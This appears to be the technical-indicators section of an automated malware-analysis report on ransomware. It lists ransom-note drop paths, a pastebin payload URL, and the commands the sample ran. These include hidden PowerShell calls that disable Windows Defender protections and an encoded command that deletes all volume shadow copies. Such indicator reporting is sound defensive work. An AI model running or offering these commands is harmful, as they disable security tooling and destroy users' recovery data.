Technical Information
- <Drive name for removable media>:\fn198-readme.txt
- https://pastebin.com/raw/ram5rbub
- firefox.exe
- %HOMEPATH%\desktop\alert.htm
- %HOMEPATH%\desktop\toolbar.bmp
- %HOMEPATH%\desktop\tileimage.bmp
- %HOMEPATH%\desktop\thlps_keeper_mayer_1965.docx
- %HOMEPATH%\desktop\testee.cer
- %HOMEPATH%\desktop\testcertificate.cer
- %HOMEPATH%\desktop\nwfieldnotes1966.docx
- %HOMEPATH%\desktop\iisstart.html
- %HOMEPATH%\desktop\howto-index.html
- %HOMEPATH%\desktop\file_p_00000000_1371597592.docx
- %HOMEPATH%\desktop\fi51.doc
- %HOMEPATH%\desktop\dashborder_144.bmp
- %HOMEPATH%\desktop\cveuropeo.doc
- %HOMEPATH%\desktop\browse.html
- %HOMEPATH%\desktop\applicantform_en.doc
- %HOMEPATH%\desktop\api-hashmap.html
- %HOMEPATH%\desktop\uep_form_786_bulletin_1726i602.doc
- %HOMEPATH%\desktop\weeklysheet1215.doc
- C:\fn198-readme.txt
- %HOMEPATH%\documents\fn198-readme.txt
- %HOMEPATH%\desktop\fn198-readme.txt
- %HOMEPATH%\contacts\fn198-readme.txt
- C:\users\public\videos\fn198-readme.txt
- C:\users\public\recorded tv\fn198-readme.txt
- C:\users\public\pictures\fn198-readme.txt
- C:\users\public\music\fn198-readme.txt
- C:\users\public\libraries\fn198-readme.txt
- C:\users\public\favorites\fn198-readme.txt
- C:\users\public\downloads\fn198-readme.txt
- C:\users\public\documents\fn198-readme.txt
- C:\users\public\desktop\fn198-readme.txt
- C:\users\default\videos\fn198-readme.txt
- C:\users\default\saved games\fn198-readme.txt
- C:\users\default\pictures\fn198-readme.txt
- C:\users\default\music\fn198-readme.txt
- C:\users\default\links\fn198-readme.txt
- C:\users\default\favorites\fn198-readme.txt
- C:\users\default\downloads\fn198-readme.txt
- C:\users\default\desktop\fn198-readme.txt
- C:\users\default\documents\fn198-readme.txt
- %HOMEPATH%\downloads\fn198-readme.txt
- %HOMEPATH%\favorites\fn198-readme.txt
- %HOMEPATH%\favorites\msn websites\fn198-readme.txt
- %HOMEPATH%\favorites\microsoft websites\fn198-readme.txt
- %HOMEPATH%\favorites\links for united states\fn198-readme.txt
- %HOMEPATH%\favorites\links\fn198-readme.txt
- C:\users\public\videos\sample videos\fn198-readme.txt
- C:\users\public\recorded tv\sample media\fn198-readme.txt
- C:\users\public\pictures\sample pictures\fn198-readme.txt
- C:\users\public\music\sample music\fn198-readme.txt
- %ProgramFiles%\microsoft sql server compact edition\v3.5\desktop\fn198-readme.txt
- C:\far2\addons\xlat\russian\fn198-readme.txt
- C:\far2\plugins\drawline\fn198-readme.txt
- C:\far2\addons\colors\default_highlighting\fn198-readme.txt
- C:\far2\addons\colors\custom_highlighting\fn198-readme.txt
- %HOMEPATH%\voip\fn198-readme.txt
- %HOMEPATH%\videos\fn198-readme.txt
- %HOMEPATH%\searches\fn198-readme.txt
- %HOMEPATH%\saved games\fn198-readme.txt
- %HOMEPATH%\pictures\fn198-readme.txt
- %HOMEPATH%\music\fn198-readme.txt
- %HOMEPATH%\links\fn198-readme.txt
- %ProgramFiles%\microsoft sql server compact edition\v3.5\fn198-readme.txt
- C:\far2\pluginsdk\headers.pas\fn198-readme.txt
- C:\far2\pluginsdk\headers.c\fn198-readme.txt
- C:\users\public\fn198-readme.txt
- C:\users\default\fn198-readme.txt
- C:\totalcmd\language\fn198-readme.txt
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\fn198-readme.txt
- %ProgramFiles%\microsoft sql server compact edition\fn198-readme.txt
- C:\far2\pluginsdk\fn198-readme.txt
- C:\far2\plugins\fn198-readme.txt
- C:\far2\fexcept\fn198-readme.txt
- C:\far2\encyclopedia\fn198-readme.txt
- C:\far2\documentation\fn198-readme.txt
- C:\far2\addons\fn198-readme.txt
- C:\users\fn198-readme.txt
- C:\totalcmd\fn198-readme.txt
- C:\recovery\fn198-readme.txt
- %ProgramFiles(x86)%\fn198-readme.txt
- %ProgramFiles%\fn198-readme.txt
- <Current directory>\fn198-readme.txt
- C:\far2\fn198-readme.txt
- C:\far2\addons\colors\fn198-readme.txt
- C:\far2\addons\macros\fn198-readme.txt
- %HOMEPATH%\fn198-readme.txt
- C:\far2\addons\setup\fn198-readme.txt
- C:\far2\plugins\tmppanel\fn198-readme.txt
- C:\far2\addons\shell\fn198-readme.txt
- C:\far2\plugins\proclist\fn198-readme.txt
- C:\far2\plugins\network\fn198-readme.txt
- C:\far2\plugins\macroview\fn198-readme.txt
- C:\far2\plugins\hlfviewer\fn198-readme.txt
- C:\far2\plugins\ftp\fn198-readme.txt
- C:\far2\plugins\filecase\fn198-readme.txt
- C:\far2\plugins\farcmds\fn198-readme.txt
- C:\far2\plugins\emenu\fn198-readme.txt
- C:\far2\plugins\ftp\lib\fn198-readme.txt
- %HOMEPATH%\favorites\windows live\fn198-readme.txt
- C:\far2\plugins\compare\fn198-readme.txt
- C:\far2\plugins\brackets\fn198-readme.txt
- C:\far2\plugins\autowrap\fn198-readme.txt
- C:\far2\plugins\arclite\fn198-readme.txt
- C:\far2\plugins\align\fn198-readme.txt
- C:\far2\encyclopedia\tap\fn198-readme.txt
- C:\far2\documentation\rus\fn198-readme.txt
- C:\far2\documentation\eng\fn198-readme.txt
- C:\far2\addons\xlat\fn198-readme.txt
- C:\far2\plugins\editcase\fn198-readme.txt
- D:\fn198-readme.txt
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoExit Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disable...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c START <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEMASABJAFQARQBDAFQAVQBSAEUAIAAtAGMAbwBuAHQAYQBpAG4AcwAgACcAQQBNA...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoExit Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disable...
- '%WINDIR%\syswow64\cmd.exe' /c START <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEMASABJAFQARQBDAFQAVQBSAEUAIAAtAGMAbwBuAHQAYQBpAG4AcwAgACcAQQBNA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
- '<SYSTEM32>\vssvc.exe'